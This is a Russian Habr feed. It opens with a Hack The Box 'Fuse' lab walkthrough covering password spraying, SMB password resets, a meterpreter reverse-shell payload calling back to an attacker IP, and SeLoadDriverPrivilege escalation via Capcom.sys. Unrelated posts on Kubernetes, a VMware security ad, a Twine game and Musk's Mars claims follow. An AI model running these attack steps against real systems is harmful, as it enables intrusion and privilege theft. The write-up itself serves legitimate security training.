Hack The Box. Прохождение Fuse. RPC, принтеры и опасная привилегия SeLoadDriverPrivilege


Продолжаю публикацию решений, отправленных на дорешивание машин с площадки HackTheBox.

В данной статье создадим словарик паролей из косвенной информации о пользователях, посмотрим на информацию о принтерах с точки зрения RPC и повышаем привилегии благодаря SeLoadDriverPrivilege.

Организационная информация

Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.

Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.

Recon

Данная машина имеет IP адрес 10.10.10.193, который я добавляю в /etc/hosts.

10.10.10.193 	fuse.htb

Первым делом сканируем открытые порты. Я это делаю с помощью следующего скрипта, принимающего один аргумент — адрес сканируемого хоста:

#!/bin/bash ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -A $1

Давайте добавим FQDN имя машины в /etc/hosts.

10.10.10.193    fuse.fabricorp.local

И на хосте работает веб-сервер. Давайте посмотрим, что там есть.

Нас встречает сайт с принтерами и мы можем скачать 4 документа, что давайте и сделаем.

Так как больше никаких векторов не находим, давай отметим для себя имена пользователей.

cat *.csv | grep 2020 | cut -d ',' -f 2 | sort | uniq

Также создадим список паролей из информации в документах.

cat *.csv | grep 2020 | cut -d ',' -f2,5-7 | tr -d '"' | tr '.' '\n' | tr ',' '\n' | tr -d ' ' | tr '-' '\n' | sort | uniq | tail -n+4

И теперь попробуем брутить, к примеру SMB.

cme smb 10.10.10.193 -u users.txt -p pass.txt --continue-on-success

И есть сообщение, что пароль для пользователя должен быть изменен.

Entry point

Давайте это и сделаем. Зададим тот же пароль.

smbpasswd -r 10.10.10.193 -U bhult

Но у нас есть несколько секунд, и пароль становится недействительным.

Поэтому выполняем две команды в связке.

smbpasswd -r 10.10.10.193 -U bhult ; rpcclient -U bhult 10.10.10.193

Давайте просмотрим всех пользователей, сделаем этот с помощью RPC.

USER

И находим интересного пользователя. Учитывая все тему с принтерами, которых уже длится все время, давайте посмотрим принтеры.

И находим пароль. Создадим список из уже действительных пользователей.

А вот теперь попробуем данный пароль для всех пользователей.

sudo cme smb 10.10.10.193 -u users.txt -p '$fab@s3Rv1ce$1' --continue-on-success

И находим двух пользователей. И у нас получается подключиться к WinRM и забрать первый флаг.

ROOT

Посмотрим информацию о текущем пользователе.

И наблюдаем привилегию SeLoadDriverPrivilege. И тут есть вектор LPE. Нам понадобятся следующее ПО: Capcom.sys, EoPLoadDriver и шелл meterpreter. Давайте создадим его.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.160 LPORT=4321 -f exe -o e.exe

И активируем листенер. Загрузим все на хост и запустим эксплоит meterpreter.

handler -p windows/x64/meterpreter/reverse_tcp -H 10.10.15.160 -P 4321

Теперь нужно загрузить драйвер.

.\eoploaddriver.exe System\CurrentControlSet\custom C:\Users\svc-print\Documents\Capcom.sys

И перед запуском эксплоита нужно немного его поправить. Давайте закомментируем следующие строки в файле /usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb.

И выполняем.

Как результат, создана новая сессия от имени SYSTEM. Вот к чему может привести привилегия SeLoadDriverPrivilege.

Вы можете присоединиться к нам в Telegram. Там можно будет найти интересные материалы, слитые курсы, а также ПО. Давайте соберем сообщество, в котором будут люди, разбирающиеся во многих сферах ИТ, тогда мы всегда сможем помочь друг другу по любым вопросам ИТ и ИБ.

ссылка на оригинал статьи https://habr.com/ru/post/525580/

Как упростить жизнь ИТ-разработчику и ускорить time-to-market с месяца до двух дней

image

На эту тему мы провели вместе с Dell Technologies и AMD онлайн-митап 29 октября, который в общей сложности увидело более 150 ИТ-разработчиков — начинающих и не очень.

Ниже запись мероприятия на случай, если вы хотели присоедениться и посмотреть, но не смогли.

Популярность микросервисной инфраструктуры растет: все больше компаний переходят на нее, чтобы удобнее и быстрее разрабатывать приложения и новые клиентские сервисы в контейнерах. Но не у всех клиентов этот переход осуществляется гладко.

  • Запуск с нуля контейнерной среды оказался сложным и трудозатратным?
  • Не хватает DevOps-инженеров?
  • Нет понятных инструкций, как разграничить ответственность между Dev и Ops
  • Затраты на инфраструктуру увеличиваются непрогнозированно и непропорционально запуску новых кластеров?
  • Вы чувствуете давление бизнес-заказчиков внутри компании, которые требуют выпускать продукты точно в срок?

На примере кейсов для банка, ритейлера и туристической компании рассказали, как упростить переход на микросервисную архитектуру с использованием готовых кластеров Kubernetes и сократить затраты на базовые сервисы при общем повышении эффективности разработки.

В программе:

  • Сценарии применения Kubernetes as a service: когда это действительно необходимо
  • Экономика DevOps: дешевле ли вырастить компетенцию внутри?
  • Выстраивание зон ответственности между провайдером и пользователем K8s-кластера
  • Лайфхак: как быстрее пройти согласование службой информационной безопасности при внедрении инфраструктуры кластера Kubernetes на примере кейса с Банком
  • Как сэкономить на инфраструктуре с помощью процессоров AMD на базе серверов Dell Technologies

ссылка на оригинал статьи https://habr.com/ru/company/croccloudteam/blog/525950/

VMware App Control. Как защитить End-of-Life операционные системы, если нет возможности их замены

Такие атаки, как WannaCry и Petya / NotPetya, продемонстрировали, что хакеры лучше знакомы с уязвимостями ваших неподдерживаемых систем, чем вы. Когда выпускаются новые исправления для новых систем, злоумышленники легко перепроектируют обновление и быстро обнаруживают все слабые места в ваших end-of-life (EOL) системах. Традиционные решения в области безопасности бессильны в обнаружении и предотвращении сложных атак и неизвестных угроз.

Такие системы часто выполняют важные бизнес-функции, имеют доступ к конфиденциальным данным и предъявляют высокие требования к производительности и доступности. Это все затрудняет их обновление или замену, когда поставщики прекращают поддержку безопасности. В результате они являются идеальными целями для хакеров, которые они могут эксплуатировать из-за важной информации, которую они могут хранить, и из-за сложности их защиты с помощью обновлений.

В дополнение к угрозам безопасности многие нормативы и стандарты, которыми должны руководствоваться организации при обеспечении безопасности и соблюдении законов о конфиденциальности данных, предусматривают строгие уровни безопасности, которым системы EOL просто не могут соответствовать. Когда системы переходят в EOL, они могут быть легко взломаны из-за отсутствия управления исправлениями или эффективной защиты конечных точек.

Уязвимости существуют в тех системах, которые никогда не будут исправлены. Это является критической областью внимания для специалистов по соответствию из-за существенного риска, который организация берет на себя, продолжая эксплуатировать их.

Компенсирующие средства контроля защиты систем EOL от повышенной ответственности и угроз

Существуют компенсирующие средства контроля, которые предприятия могут внедрить, чтобы помочь снизить ответственность, связанную с использованием операционных систем EOL, и обеспечить их безопасность. Некоторые из ключевых методов — изоляция / сегментация сети, виртуализация и контроль / внесение в белый список приложений.

Изоляция / сегментация сети

Одним из вариантов защиты устройств EOL является размещение критически важных серверов в изолированной сети, чтобы гарантировать, что устройства не смогут взаимодействовать с какими-либо машинами за ее пределами или подключаться к Интернету. Благодаря изоляции сети устройства EOL становятся защищенными от угроз, но резко ограничивают доступ к другим критически важным ресурсам, включая функции Интернета и облаков. Хотя эту модель безопасности можно использовать в качестве компенсирующего элемента управления для уменьшения угроз, она может создавать помехи для бизнеса и влиять на производительность конечного пользователя, поскольку большинство критически важных приложений на серверах необходимо подключать к корпоративным серверам для доступа сотрудников.

Виртуализация

Размещение хостов в виртуализированной среде может обеспечить ряд преимуществ безопасности: улучшенный контроль над критически важными хостами, простота повторного создания образа в случае компрометации, возможность ограничения воздействия на критические сервера. Если хост становится целью, его можно быстро изолировать и повторно инициализировать, но для критически важных серверов, на которых выполняются приложения, требующие круглосуточного доступа, виртуализация представляет собой возможность повышенного администрирования и ресурсов. Это также может привести к сбоям политик соответствия, поскольку данные должны контролироваться или не могут выполняться в виртуальной среде.

Контроль приложений и белый список

“Australian Signals Directorate’s Essential Eight” (ASD) назвала «белый список» номером один в модели защиты приложений, которая представляет собой модель безопасности, позволяющую запускать известные «хорошие» приложения, а не блокировать известные «плохие». Позволяя запускать только доверенное программное обеспечение, белый список приложений останавливает эксплойты и уменьшает администрирование, связанное с исправлениями и обновлениями системы и приложений. В режиме «отказ-по-умолчанию» белый список приложений является высокоэффективным компенсирующим контролем, который отвечает нормативным стандартам соответствия и защищает устаревшие системы.

Проверенная эффективность контроля безопасности и соответствия

Coalfire, независимая квалифицированная компания по оценке безопасности, протестировала и определила, что VMware App Control может обеспечить гибкость для включения, управления и удовлетворения требований PCI DSS в таких областях, как мониторинг / контроль целостности файлов, мониторинг изменений и оповещений, а также сохранение аудиторского контроля.

Решение также может

  • Поддерживать разработку комбинации прямого и компенсирующего управления для таких требований, как антивирус и патч-менеджмент (защита не обновленных систем).
  • Поддерживать постоянное соответствие для ключевых структур, включая PCI-DSS, ASD, GDPR, FISMA, NIST, Singapore MAS и многих других.

Обеспечивать

  • Мониторинг критической активности и обеспечение конфигурации для оценки риска и поддержания целостности системы.
  • Безопасность EOL систем с мощными политиками контроля изменений и белых списков.

Carbon Black защищает серверы и критические системы / системы EOL со 100% эффективностью. VMware App Control доверяет более 2000 организаций, в том числе более 25 из списка Fortune 100, для защиты своих корпоративных конечных точек и серверов. Это проверенное решение, которое можно реализовать для обеспечения постоянной безопасности ваших устройств после окончания срока службы.

Наилучшая защита

VMware App Control — единственное решение, которое остановило 100% атак в тесте NSS Labs 2017 Advanced Endpoint Protection (AEP).
Это возможно благодаря таким ее функциям, как:

  • Блокировка систем: остановка вредоносных программ, вымогателей и атак нулевого дня
  • Блокировка несанкционированных изменений: встроенный мониторинг целостности файлов, управление устройством и защита памяти
  • Защита критически важных систем: поддержка встроенных, виртуальных и физических ОС

Высокая производительность

VMware App Control — проверенное и масштабируемое решение для управления приложениями. Один администратор может управлять более чем 10 000 системами, предоставляя группам безопасности полный контроль при минимальных усилиях.

  • Готовые шаблоны позволяют снизить накладные расходы на управление
  • Встроенный рабочий процесс и механизмы автоматизации помогают ускорить имплементацию
  • Облачная репутация для быстрых решений на надежном программном обеспечении

Где купить или получить консультацию

Softprom — официальный дистрибьютор компании VMware Carbon Black.

VMware на сайте ROI4CIO.

ссылка на оригинал статьи https://habr.com/ru/company/roi4cio/blog/525952/

Как я IF на Twine писал

Привет Хабр! Это мой первый пост, и я хотел бы поделиться опытом создания IF-игры на Twine. Рассказать о преимуществах и недостатках инструмента, которые заметил во время работы, ну и немного о самой игре.

image

Началось все пять месяцев назад, когда мне предложили сделать IF-игру.

IF-игры – это игры, в которых взаимодействие с игроком происходит с помощью текстовой информации. Есть 2 варианта взаимодействия: ввод текста или выбор из уже предложенных вариантов.

В качестве примера была выбрана игра Dictator, т.к. она была похожа на то, что планировалось реализовать. Dictator – это компьютерная игра в жанре политический симулятор, разработанная Доном Пристли и выпущенная для компьютера ZX Spectrum, а впоследствии была портирована под разные платформы.

Главный герой, правитель банановой страны, пытается удержать власть всеми силами. Геймплей довольно прост. Диктатор, то есть игрок, должен выбрать один из предложенных вариантов действий. Задача – продержаться на посту главы государства как можно дольше.

Для разработки игры я выбрал Twine. На просторах интернета можно найти и похожие инструменты, но потыкав пару вариантов, решил остановиться на Twine, т.к. он больше приглянулся по интерфейсу и был бесплатным.

Немного о реализации

Игра называется Political games. В начале каждого месяца одна из политических фракций задает вопрос, а игрок должен выбрать действие, которое, возможно, улучшит ситуацию. Например, продать землю, или купить вертолет, чтобы в случае провала свалить из этого богом забытого места.

Создание игры сводится к написанию html в параграфах: каждый параграф – отдельная страница, которую в дальнейшем можно стилизовать. Как разработчик я могу выбрать, с какого именно параграфа будет начинаться история. Я добавил 2 параграфа: один для размещения переменных, которые будут отвечать за очки и счетчик месяцев, а второй для списка вопросов. И потом использовал display этих двух параграфов в начальном. Переходы между параграфами осуществляются с помощью ссылок. Далее в параграфах реализуется разметка того, как будет выглядеть страница.

В итоге, получилось примерно вот такое дерево:

image

Тот параграф, который отмечен зеленым значком и является начальным. Количество параграфов возможно можно было уменьшить, но у меня так и не вышло этого сделать.

О Twine

Twine — открытая платформа для написания интерактивной литературы, текстовых игр и визуальных новелл. Позволяет публиковать игры в виде html страниц и не требует от автора глубоких познаний в программировании.

Можно работать с ним как в онлайн-версии, так и скачать софтину себе на компьютер.

Большим плюсом онлайн-версии является то, что после изменения и нажатия на кнопку «Play» уже открытая вкладка с историей перезагрузится. В десктопной же после нескольких десятков изменений и запуска истории появляется 100500 вкладок.

В Twine есть несколько движков, или как это называется в Twine, форматов игры.

image

В каждом формате игры есть различия в плане синтаксиса, а также в различиях в плане функционала. Для каждого из них есть дока, а также можно найти исходный код на github. Самым оптимальным мне показался SugarCube 2. В нем и синтаксис удобный, и дебаг неплохой.

Проект можно как экспортировать, так и импортировать. Но, если вдруг захочется изменить файл в редакторе, а потом обратно импортировать, эти изменения не сохранятся, т.к. Twine при запуске игры пересоберёт файл заново, и все добавленное просто удалится. Это создает небольшое неудобство, в случаях, когда надо добавить метаинформацию, favicon или же сторонние css и js файлы. В таком случае приходится добавлять их через JavaScript. Действие-то простое, но лучше бы было простое добавление тега в секцию head.

Еще одна из проблем в Twine — отсутствие автокомплита, поэтому всю разметку, названия свойств нужно прописывать руками. И это в то время, когда во всех редакторах кода он присутствует!

Итог

Twine хорошо подходит для создания небольших проектов или прототипов. Можно быстренько запилить IF-игрушку. Лично мне хватило этого инструмента, за исключением некоторых минусов.

Из минусов технологии:

  • Есть проблемы с десктопной версией
  • Нет автокомплита
  • Не удобно работать с head секцией, приходится делать через js
  • Нет live-reloading, поэтому во время разработки приходится постоянно перезапускать игру, нажимая на кнопку «Play»

Плюсы:

  • Бесплатный инструмент
  • Понятный и простой
  • Есть достаточно возможностей сделать что-то интересное

Если кто-то хочет попробовать себя в роли диктатора, вытащить страну из бедности на небывалые высоты или, наоборот, ввергнуть ее в пучину гражданской войны, то милости прошу. Буду рад конструктивной критике.

ссылка на оригинал статьи https://habr.com/ru/post/525960/

Илон Маск: «Марс — свободная планета, там не действуют законы Земли»

Глава SpaceX на днях провозгласил независимость Марса от Земли. Сделал он это, разместив соответствующие пункты в пользовательском соглашении Starlink, сети и сервисе спутникового интернета. Сейчас сервис перешел в фазу тестирования и первые пользователи (скорее всего из штата Техас, США) получают возможность подключиться к спутниковому глобальному интернету.

Все это прописано в подразделе «Governing Laws», где рассказывается о том, что SpaceX не будет подчиняться международным законам вне Земли. Вместо этого компания установит принципы самоуправления и станет использовать их во благо человечества.

Что касается Марса, то Илон Маск провозглашает его «свободной планетой», на которой будут действовать собственные законы. Если кто-то не согласен с условиями использования сервиса, то не может и использовать глобальный спутниковый интернет. Первыми ссылкой на условия использования Starlink распространили пользователи группы WholeMarsBlog.

В разделе условий говорится, что на Земле и Луне компания подчиняется земным законам, а вот на Марсе — иное дело, здесь будут «установлены принципы самоуправления, направленные на процветание будущей колонии». Этот пункт начнет работать только тогда, когда на Марсе появится колония.

Ранее Маск неоднократно заявлял, что собирается построить на Марсе поселение, которое не будет зависеть от снабжения ресурсами от Земли. Это будет целиком и полностью автономное поселение — и сейчас стало ясно, что под «автономностью» глава SpaceX имеет в виду не только еду, воду, одежду, технику, горючее, но и законодательство.

Конечно, SpaceX должна решить множество проблем, прежде, чем создание колонии будет возможным. Ведь туда необходимо доставить миллионы тонн оборудования и рерсурсов, для чего потребуется задействовать тысячи ракет Starship, которые сейчас лишь тестируются.

«Если мы построим столько же кораблей Starship, сколько у нас ракет Falcon — то есть около сотни, — и каждый будет доставлять на орбиту 100 тонн груза, то пропускная способность достигнет 10 млн тонн полезной нагрузки в год», — написал глава SpaceX.

Зачем Маску Марс? Для того, чтобы у человечества был «бэкап», который можно использовать в случае появления глобальных проблем, которые приведут к вымиранию человечества. Речь идет о третьей мировой войне, инфекциях или чему-то подобном. Маск неоднократно заявлял, что без основания колонии на другой планете Солнечной системы человечество обречено.

Все, чем управляет Маск, направлено на единственную цель — накопление ресурсов для получения колонии на Марсе. Колония даст возможность жителям Марса находиться вне зоны влияния факторов, которые важны для человека на Земле.

Насколько можно видеть, пока что слова Маска не расходятся с делом — он действительно пытается достичь Марса, разрабатывая ракеты носители нового типа, капсулы для команды, космическое оборудование и т.п.

ссылка на оригинал статьи https://habr.com/ru/company/selectel/blog/525962/